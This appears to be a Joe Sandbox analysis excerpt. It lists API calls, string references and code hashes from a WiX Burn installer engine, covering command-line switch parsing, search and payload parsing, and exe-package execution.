Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C424
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: c97b7f32e88c8317979bc21828483f6e46a8de40dbf643b401fa17abfb56ac52
                                                                                                                                                                                                                                                                            • Instruction ID: eb49a95c873996da8e33bd694c983fa116f305ea2bd90634d60b6ac2889a358e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c97b7f32e88c8317979bc21828483f6e46a8de40dbf643b401fa17abfb56ac52
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26B012C325F102AE328451445E06D3A024CC0C4BA0331E42FF008C8040D8840C010037
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C424
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: fefcb2a0cb6568b9b40d072109dbdf465f1d58cf290f50fea63b6fb00edb410f
                                                                                                                                                                                                                                                                            • Instruction ID: 5e1ac94e24e4cc4c6c55815b7d030779c423bf2481ea6026d492461cd09d4de8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fefcb2a0cb6568b9b40d072109dbdf465f1d58cf290f50fea63b6fb00edb410f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18B012C326F102AE328451445D06E3A024CD4C4B64331E82FF008C4040D8840C000037
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0095E414,000000FF,008E6C5C,008E6C78,008E6570,?,00000000,?), ref: 0090470C
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0090472F
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00904752
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E458,000000FF), ref: 00904775
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E45C,000000FF), ref: 00904798
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009047BB
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E46C,000000FF), ref: 009047DE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 00904801
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E47C,000000FF), ref: 00904824
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 00904847
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 0090486A
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 00904898
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,unsafeuninstall,000000FF), ref: 00904970
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,uninstall,000000FF), ref: 009049AE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,repair,000000FF), ref: 009049EC
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,modify,000000FF), ref: 00904A2A
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,package,000000FF), ref: 00904A68
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,update,000000FF), ref: 00904A8B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,noaupause,000000FF), ref: 00904AAE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,keepaupaused,000000FF), ref: 00904AD9
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,disablesystemrestore,000000FF), ref: 00904B0E
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,originalsource,000000FF), ref: 00904B3C
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent,000000FF), ref: 00904B9D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent:none,000000FF), ref: 00904BFE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.log.append,000000FF), ref: 00904C51
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.log.mode,burn.log.mode,000000FF), ref: 00904C99
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00904CAB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.log.mode), ref: 00904CBF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.elevated,000000FF), ref: 00904D6C
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room), ref: 00904E5B
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room,burn.clean.room,00000000), ref: 00904E69
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00904E7B
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room), ref: 00904EFB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.system.component), ref: 00904F7F
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.system.component,burn.system.component,00000000), ref: 00904F8D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00904F9F
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.system.component), ref: 00904FAF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.embedded,000000FF), ref: 00905024
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.detect,000000FF), ref: 009050BA
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.upgrade,000000FF), ref: 009050FD
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,burn.related.addon,000000FF), ref: 0090511D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.addon,000000FF), ref: 00905141
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.patch,000000FF), ref: 00905164
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.patch,000000FF), ref: 00905187
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.update,000000FF), ref: 009051AA
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.chain.package,000000FF), ref: 009051D0
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.passthrough,000000FF), ref: 009051F6
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.runonce,000000FF), ref: 00905224
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00905280
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ignoredependencies,burn.ignoredependencies,00000000), ref: 0090528E
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009052A0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 009052B0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ancestors), ref: 00905325
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ancestors,burn.ancestors,00000000), ref: 00905333
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00905345
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ancestors), ref: 00905355
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009053CD
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.engine.working.directory,burn.engine.working.directory,00000000), ref: 009053DB
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009053ED
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009053FD
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00905468
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000), ref: 00905476
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00905488
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 0090549C
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00905527
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000), ref: 00905535
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00905547
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00905557
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.splash.screen), ref: 009055D0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.splash.screen,burn.splash.screen,00000000), ref: 009055DE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009055F0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.splash.screen), ref: 00905600
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.), ref: 0090567F
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0090568D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 0090569F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString$lstrlen
                                                                                                                                                                                                                                                                            • String ID: -$Clean room command-line switch must be first argument on command-line.$Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to copy source process path.$Failed to ensure size for secret args.$Failed to ensure size for unknown args.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse file handle: '%ls'$Failed to parse splash screen window: '%ls'$Failed to store the custom working directory.$Invalid switch: %ls$Missing required parameter for switch: %ls$Multiple mode command-line switches were provided.$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$burn.$burn.ancestors$burn.clean.room$burn.elevated$burn.embedded$burn.engine.working.directory$burn.filehandle.attached$burn.filehandle.self$burn.ignoredependencies$burn.log.append$burn.log.mode$burn.passthrough$burn.related.addon$burn.related.chain.package$burn.related.dependent.addon$burn.related.dependent.patch$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.splash.screen$burn.system.component$d:\a\wix4\wix4\src\burn\engine\core.cpp$disablesystemrestore$help$keepaupaused$layout$log$modify$noaupause$originalsource$package$parent$parent:none$passive$quiet$repair$silent$uninstall$unsafeuninstall$update$xlog
                                                                                                                                                                                                                                                                            • API String ID: 1657112622-287467567
                                                                                                                                                                                                                                                                            • Opcode ID: 58650ec05bd2a31d605282122272a8a76b26df26da8399998f1e6f400589e991
                                                                                                                                                                                                                                                                            • Instruction ID: 1f4107289b8b0c940662b8d8c7e8749c3fb20388ee880bf7f942e463a799e6d7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58650ec05bd2a31d605282122272a8a76b26df26da8399998f1e6f400589e991
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3B206B1688711BFEB20DF04CC4AF677369EB55B25F608A14FA65EB2D0D6B1E840CB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008F278C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,DirectorySearch,000000FF,00000000,Condition,008E7E53,00000000,Variable,008E7E4F,00000000,00951D1C,008E7E4B,008E7E4B), ref: 008F1A63
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,Path,008E7E5F), ref: 008F1AD2
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,path,00000000), ref: 008F1AEF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,FileSearch,000000FF), ref: 008F1B15
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,DisableFileRedirection,008E7E63,00000000,Path,008E7E5F), ref: 008F1BB3
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 008F22EE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Compare$FreeHeap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch|ExtensionSearch|SetVariable$DisableFileRedirection$ExpandEnvironment$ExtensionId$ExtensionSearch$Failed to allocate memory for search structs.$Failed to find extension '%ls' for search '%ls'$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @ExtensionId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Value.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get DisableFileRedirection attribute.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$SetVariable$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$d:\a\wix4\wix4\src\burn\engine\search.cpp$directory$exists$formatted$keyPath$language$numeric$path$state$string$value$version
                                                                                                                                                                                                                                                                            • API String ID: 1229322287-2296787432
                                                                                                                                                                                                                                                                            • Opcode ID: ddb827d80582d490676fc965fcad5cddbc30ebc590a59c9984b781ee198a5221
                                                                                                                                                                                                                                                                            • Instruction ID: ad52e716075bc43c0ea7b6cf4366f06187807ad7d39c9a59c15fc812fc279e4b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddb827d80582d490676fc965fcad5cddbc30ebc590a59c9984b781ee198a5221
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2822831A84219BBDB209A628C4EF7F3969FBC6B29F210064FF14EB1D1D6749D41D760
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: @Container is required for embedded payload.$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to add payload to container dictionary.$Failed to add payload to payloads dictionary.$Failed to allocate memory for layout payloads.$Failed to allocate memory for payload structs.$Failed to create dictionary for container payloads.$Failed to create dictionary for payloads.$Failed to find container: %ls$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$File size is required when verifying by hash for payload: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$There was no verification information for payload: %ls$d:\a\wix4\wix4\src\burn\engine\payload.cpp$embedded$external
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-2408702627
                                                                                                                                                                                                                                                                            • Opcode ID: a339f1c4bfb2423ac129ea2289f280209c0b744f88f3c778f57534db214bd87f
                                                                                                                                                                                                                                                                            • Instruction ID: a495ef9f2c668a805f3a6af4db2bf4f24ac5dd6f6616db204821e988f1c83ed8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a339f1c4bfb2423ac129ea2289f280209c0b744f88f3c778f57534db214bd87f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE320631680295BBDB11DA178C4AF6F36B5FBC6B19F214038BB14FB1C2EAB0A941C755
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,00000000,?,?,?,?,?,00000000,00000000,?,008E6DA2,00000000,00000000,8000FFFF,?), ref: 00912EFE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get cached path for package: %ls, xrefs: 0091284E
                                                                                                                                                                                                                                                                            • Failed to append argument from ARP., xrefs: 00912B68
                                                                                                                                                                                                                                                                            • Failed to get command-line argument for install., xrefs: 00912A0F
                                                                                                                                                                                                                                                                            • %ls %ls, xrefs: 00912D05
                                                                                                                                                                                                                                                                            • Failed to run exe with Burn protocol from path: %ls, xrefs: 00912DA3
                                                                                                                                                                                                                                                                            • Failed to run netfx chainer: %ls, xrefs: 00912DE0
                                                                                                                                                                                                                                                                            • Process returned error: 0x%x, xrefs: 00912E64
                                                                                                                                                                                                                                                                            • burn.filehandle.self, xrefs: 00912C6D
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 009125A5, 00912641, 00912646, 0091265A, 0091268D, 009126E2, 009126ED, 00912745, 00912750, 00912798, 009127D8, 009128D6, 009128E1, 00912A65, 00912A70, 00912E55, 00912E5B, 00912E72
                                                                                                                                                                                                                                                                            • Failed to copy package arguments., xrefs: 0091293D
                                                                                                                                                                                                                                                                            • QuietUninstallString is null., xrefs: 009126F5
                                                                                                                                                                                                                                                                            • burn.ignoredependencies, xrefs: 00912BB2
                                                                                                                                                                                                                                                                            • Failed to append the relation type to the command line., xrefs: 00912B9B
                                                                                                                                                                                                                                                                            • Failed to verify the QuietUninstallString executable path is in a secure location: %ls, xrefs: 009127C6
                                                                                                                                                                                                                                                                            • -%ls=%ls, xrefs: 00912BF9
                                                                                                                                                                                                                                                                            • Failed to separate command-line arguments., xrefs: 00912AAC
                                                                                                                                                                                                                                                                            • Failed to format obfuscated argument string., xrefs: 00912CE5
                                                                                                                                                                                                                                                                            • QuietUninstallString must contain an executable path., xrefs: 00912758
                                                                                                                                                                                                                                                                            • Failed to append the list of ancestors to the command line., xrefs: 00912C0D
                                                                                                                                                                                                                                                                            • Failed to query ArpEntry for %hs., xrefs: 00912593
                                                                                                                                                                                                                                                                            • Failed to append the custom working directory to the exepackage command line., xrefs: 00912C3E
                                                                                                                                                                                                                                                                            • The QuietUninstallString executable path is not in a secure location: %ls, xrefs: 009127F2
                                                                                                                                                                                                                                                                            • Failed to copy executable path., xrefs: 00912786
                                                                                                                                                                                                                                                                            • Failed to get command-line argument for repair., xrefs: 009129E2
                                                                                                                                                                                                                                                                            • Failed to get parent directory for pseudo-package: %ls, xrefs: 009126AC
                                                                                                                                                                                                                                                                            • "%ls", xrefs: 00912AE0
                                                                                                                                                                                                                                                                            • -%ls, xrefs: 00912B87
                                                                                                                                                                                                                                                                            • Failed to build executable path., xrefs: 0091267B, 0091287A
                                                                                                                                                                                                                                                                            • burn.related.chain.package, xrefs: 00912B7F
                                                                                                                                                                                                                                                                            • Invalid Exe package action: %d., xrefs: 009128EF, 00912A7E
                                                                                                                                                                                                                                                                            • install, xrefs: 0091258D, 00912592
                                                                                                                                                                                                                                                                            • Failed to get command-line argument for uninstall., xrefs: 00912A95
                                                                                                                                                                                                                                                                            • burn.ancestors, xrefs: 00912BF4
                                                                                                                                                                                                                                                                            • Pseudo ExePackages must have a fully qualified target path., xrefs: 0091264C
                                                                                                                                                                                                                                                                            • Failed to evaluate executable package command-line condition., xrefs: 00912AC3
                                                                                                                                                                                                                                                                            • Failed to allocate base command., xrefs: 00912AF4
                                                                                                                                                                                                                                                                            • Failed to format argument string., xrefs: 00912CB6
                                                                                                                                                                                                                                                                            • uninstall, xrefs: 00912586
                                                                                                                                                                                                                                                                            • WixBundleExecutePackageAction, xrefs: 009128B1, 00912F1D
                                                                                                                                                                                                                                                                            • -norestart, xrefs: 00912B3D
                                                                                                                                                                                                                                                                            • -%ls=ALL, xrefs: 00912BBA
                                                                                                                                                                                                                                                                            • Failed to append %ls, xrefs: 00912C72
                                                                                                                                                                                                                                                                            • Failed to parse QuietUninstallString: %ls., xrefs: 00912723
                                                                                                                                                                                                                                                                            • Failed to append the list of dependencies to ignore to the command line., xrefs: 00912BCE
                                                                                                                                                                                                                                                                            • Failed to append norestart argument., xrefs: 00912B51
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00912EFE
                                                                                                                                                                                                                                                                            • Failed to run EXE process, xrefs: 00912E19
                                                                                                                                                                                                                                                                            • Failed to get parent directory for QuietUninstallString executable path: %ls, xrefs: 00912820
                                                                                                                                                                                                                                                                            • Failed to allocate obfuscated exe command., xrefs: 00912D19
                                                                                                                                                                                                                                                                            • WixBundleExecutePackageCacheFolder, xrefs: 00912899, 00912F0C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
